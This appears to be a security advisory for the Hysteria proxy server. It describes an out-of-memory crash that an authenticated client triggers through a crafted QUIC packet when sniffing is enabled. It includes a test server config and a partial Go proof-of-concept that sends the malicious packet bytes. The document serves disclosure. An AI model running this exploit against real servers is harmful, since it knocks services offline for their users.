A specially constructed quic package can crash the server OOM when the sniff is enabled.
When the server has sniff enabled, a valid connection can request the server to forward UDP traffic and construct a huge crypto length. The server will allocate memory according to this length, causing an OOM.
openssl req -x509 -newkey rsa:2048 -nodes -keyout localhost.key -out localhost.crt -days 365 -subj "/CN=localhost" 2>/dev/null
server.yaml
listen: :8443
tls:
cert: localhost.crt
key: localhost.key
auth:
type: password
password: mypassword
sniff:
enable: true
outbounds:
- name: my_direct
type: direct
default: true
poc.go
package main
import (
"flag"
"fmt"
"log"
"net"
"time"
"github.com/apernet/hysteria/core/v2/client"
)
func main() {
serverAddrStr := flag.String("server", "127.0.0.1:8443", "Hysteria server address")
password := flag.String("password", "mypassword", "Hysteria server password")
flag.Parse()
serverAddr, _ := net.ResolveUDPAddr("udp", *serverAddrStr)
c, _, err := client.NewClient(&client.Config{
ServerAddr: serverAddr, Auth: *password, TLSConfig: client.TLSConfig{InsecureSkipVerify: true},
})
if err != nil {
log.Fatalf("Failed to connect: %v", err)
}
defer c.Close()
var maliciousQUICPacket = []byte{
0xcb, 0x0, 0x0, 0x0, 0x1, 0x8, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x0, 0x0,
0x32, 0x1d, 0xa8, 0xd6, 0x3c, 0x51, 0x24, 0xb7, 0xbe, 0xf2, 0x91, 0x77, 0x1c, 0x9d, 0x66,...
Exploitability
AV:NAC:LPR:LUI:NScope
S:UImpact
C:HI:HA:H8.8/CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H